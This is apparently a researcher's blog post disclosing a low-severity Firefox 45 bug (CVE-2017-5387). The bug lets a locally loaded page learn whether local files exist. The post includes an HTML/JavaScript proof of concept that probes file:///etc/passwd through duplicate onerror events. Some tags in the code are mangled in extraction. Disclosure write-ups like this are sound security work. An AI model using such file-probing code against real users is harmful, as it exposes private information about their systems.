Firefox Local Filename Enumeration (sec-low)

Hello everyone,

This is going to be a short write up about my first find regarding browser bugs, which was found in Firefox/45.0. The bug is of type “csectype-disclosure” and was flagged as sec-low by Mozilla’s team due to the fact that the malicious page has to be loaded locally (via the file:// protocol).

The bug existed because a ‘s onerror event is fired twice if the file pointed to in it’s src attribute doesn’t exist, but fires only once if the file existed but is not playable. The tag has to be included inside the opening and closing tags of an or . The following code is the PoC that was typically sent along with the report to Mozilla’s team:

<html>
<head>
<title>Testingtitle>
head>
<audio>
   <track id="q" src="file:///etc/passwd">
audio>
<script>
var i=0;
q.onerror=function(){
    i++;
   
};
setTimeout(function(){
    if(i==1){
            alert('File Exists');
        }else{
            alert('File Does Not Exist');
            }
 
    },100);
script>
body>
html>

Finally, I would like to shout out to @Qab for making all that possible.

Update: This bug has been assigned CVE-2017-5387.

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s